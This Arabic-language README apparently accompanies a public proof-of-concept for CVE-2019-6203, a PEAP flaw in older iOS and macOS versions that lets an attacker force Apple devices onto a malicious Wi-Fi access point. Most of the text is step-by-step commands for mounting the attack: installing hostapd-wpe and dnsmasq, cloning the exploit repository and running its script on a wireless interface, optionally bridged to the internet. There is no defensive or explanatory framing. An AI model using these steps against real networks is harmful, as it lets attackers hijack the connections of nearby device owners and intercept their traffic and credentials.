
إثبات المفهوم لـ CVE-2019-6203، يعمل على < iOS 12.2، macOS < 10.14.4
يوجد خلل في PEAP في جميع أجهزة Apple يسمح للمهاجم بإجبار أي جهاز Apple (iOS, macOS أو tvOS) على الارتباط بنقطة وصول ضارة.
هذا إثبات المفهوم لـ CVE-2019-6203، يعمل على الإصدارات < iOS 12.2, macOS < 10.14.4، تم اختباره على Kali Linux.
تحتاج إلى بطاقة Wi-Fi تدعم وضع AP لتشغيل هذا الإثبات. يمكنك التحقق من ذلك عن طريق تشغيل iw list، والإخراج يكون مثل:
Supported interface modes:
* IBSS
* managed
* AP
* AP/VLAN
* monitor
* mesh point
apt install hostapd-wpe dnsmasq
git clone https://github.com/qingxp9/CVE-2019-6203-PoC
cd CVE-2019-6203-PoC
python CVE-2019-6203-PoC.py -i wlan0
#with Internet
python CVE-2019-6203-PoC.py -i wlan0 -o eth0
فيديو: https://youtu.be/UEzdtkcnrYw